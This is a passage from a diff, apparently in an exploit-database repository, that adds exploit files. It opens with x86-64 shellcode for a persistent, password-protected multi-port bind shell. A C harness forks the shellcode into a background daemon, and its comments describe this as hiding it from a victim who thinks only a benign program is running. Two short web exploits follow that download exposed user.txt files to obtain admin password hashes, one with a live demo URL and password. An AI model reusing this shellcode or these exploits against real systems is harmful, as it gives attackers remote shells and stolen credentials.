"\xe6\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b"
|
||||||
|
"\x0f\x05\xe9\x6c\xff\xff\xff";
|
||||||
|
|
||||||
|
|
||||||
|
//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!=======================
|
||||||
|
//| =========================================================================
|
||||||
|
//| CODE3 Persistent bind shell with multi-port/terminal + password (177 bytes)
|
||||||
|
//| =========================================================================
|
||||||
|
//| This bind shell has everything COD2 has to offer + more while only 29 bytes more
|
||||||
|
//| You will get as many terminals on the victim as your PORT-RANGE minus 1
|
||||||
|
//| Your lowest port will NOT be open (so minus 1 port/terminal from your range)
|
||||||
|
//| Example: ports 4440-4445 = ports 4441-4445 usable = 5 terminals on victim
|
||||||
|
|
||||||
|
|
||||||
|
unsigned char CODE3[] = //replace CODE3 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
|
||||||
|
"\x48\x31\xf6\x56\x66\x68"HIGH_PORT"\x5b\x48\xff\xcb\x66\x81\xfb"LOW_PORT""
|
||||||
|
"\x75\x06\x50\x66\x68"HIGH_PORT"\x5b\x48\x31\xff\x48\xf7\xe7\xb0\x39\x0f"
|
||||||
|
"\x05\x48\x31\xff\x48\x39\xf8\x74\x7b\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02"
|
||||||
|
"\x6a\x01\x5e\xb0\x29\x0f\x05\x48\x97\x86\xdf\x6a\x02\x66\x89\x5c\x24\x02"
|
||||||
|
"\x86\xdf\x54\x5e\x52\xb2\x10\xb0\x31\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b"
|
||||||
|
"\x0f\x05\x40\x88\xc7\x40\xb6\x03\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x89"
|
||||||
|
"\xc7\x48\x89\xc6\x48\x8d\x74\x24\xf0\x6a\x10\x5a\x0f\x05\x48\xb8"PASSWORD""
|
||||||
|
"\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x48\x31\xf6\x48\xf7\xe6"
|
||||||
|
"\x50\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x51\x54\x5f\xb0\x3b\x0f\x05"
|
||||||
|
"\x48\x31\xff\x48\xf7\xe7\xe9\x58\xff\xff\xff";
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
//|========================== VOID SHELLCODE ===========================
|
||||||
|
void SHELLCODE()
|
||||||
|
{
|
||||||
|
// This part floods the registers to make sure the shellcode will always run
|
||||||
|
__asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
|
||||||
|
"mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t"
|
||||||
|
"mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t"
|
||||||
|
"mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t"
|
||||||
|
"mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
|
||||||
|
"call CODE3"); //1st CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
|
||||||
|
}
|
||||||
|
|
||||||
|
//|========================== VOID printBytes ===========================
|
||||||
|
void printBytes()
|
||||||
|
{
|
||||||
|
printf("The CripSlick's code is %d Bytes Long\n",
|
||||||
|
strlen(CODE3)); //2nd CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
//|============================== Int main ================================
|
||||||
|
int main ()
|
||||||
|
{
|
||||||
|
|
||||||
|
// IMPORTANT> replace CODEX the "unsigned char" variable below
|
||||||
|
// > This needs to be done twice (for string count + code to use)
|
||||||
|
|
||||||
|
int pid = fork(); // fork start
|
||||||
|
if(pid == 0){ // pid always starts at 0
|
||||||
|
|
||||||
|
SHELLCODE(); // launch void SHELLCODE
|
||||||
|
// this is to represent a scenario where you bind to a good program
|
||||||
|
// you always want your shellcode to run first
|
||||||
|
|
||||||
|
}else if(pid > 0){ // pid will always be greater than 0 after the 1st process
|
||||||
|
// this argument will always be satisfied
|
||||||
|
|
||||||
|
printBytes(); // launch printBYTES
|
||||||
|
// pretend that this is the one the victim thinks he is only using
|
||||||
|
}
|
||||||
|
return 0; // satisfy int main
|
||||||
|
system("exit"); // keeps our shellcode a daemon
|
||||||
|
}
|
||||||
|
|
||||||
1730
platforms/multiple/remote/40125.py
Executable file
1730
platforms/multiple/remote/40125.py
Executable file
File diff suppressed because it is too large
Load diff
13
platforms/php/webapps/40126.txt
Executable file
13
platforms/php/webapps/40126.txt
Executable file
|
|
@ -0,0 +1,13 @@
|
||||||
|
# Exploit Title: Free News Script User Password Download File
|
||||||
|
# Date: 2016-07-18
|
||||||
|
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
|
||||||
|
# Vendor Homepage: http://www.newsp.eu/index.php?pt=ns
|
||||||
|
# Version: All Version
|
||||||
|
# Download Link : http://www.newsp.eu/newsp.zip
|
||||||
|
|
||||||
|
Exploit :
|
||||||
|
http://site/admin/user.txt
|
||||||
|
Admin|e3afed0047b08059d0fada10f400c1e5|1|1|1|1|
|
||||||
|
|
||||||
|
Username = Admin
|
||||||
|
Password Hash = e3afed0047b08059d0fada10f400c1e5 [MD5]
|
||||||
16
platforms/php/webapps/40127.txt
Executable file
16
platforms/php/webapps/40127.txt
Executable file
|
|
@ -0,0 +1,16 @@
|
||||||
|
# Exploit Title: PHP calendar script Password Download File
|
||||||
|
# Date: 2016-07-18
|
||||||
|
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
|
||||||
|
# Vendor Homepage: http://www.newsp.eu/calendarscript.php?pt=st
|
||||||
|
# Version: All Version
|
||||||
|
# Download Link : http://www.newsp.eu/calendar.zip
|
||||||
|
|
||||||
|
Exploit :
|
||||||
|
http://site/user.txt
|
||||||
|
Admin|fe01ce2a7fbac8fafaed7c982a04e229
|
||||||
|
Password Hash = fe01ce2a7fbac8fafaed7c982a04e229 (demo)[MD5]
|
||||||
|
|
||||||
|
Test :
|
||||||
|
Exploit : http://www.newsp.eu/demo/user.txt
|
||||||
|
Login Url : http://www.newsp.eu/demo/login.php
|
||||||
|
Password : demo
|
||||||
Loading…
Add table
Reference in a new issue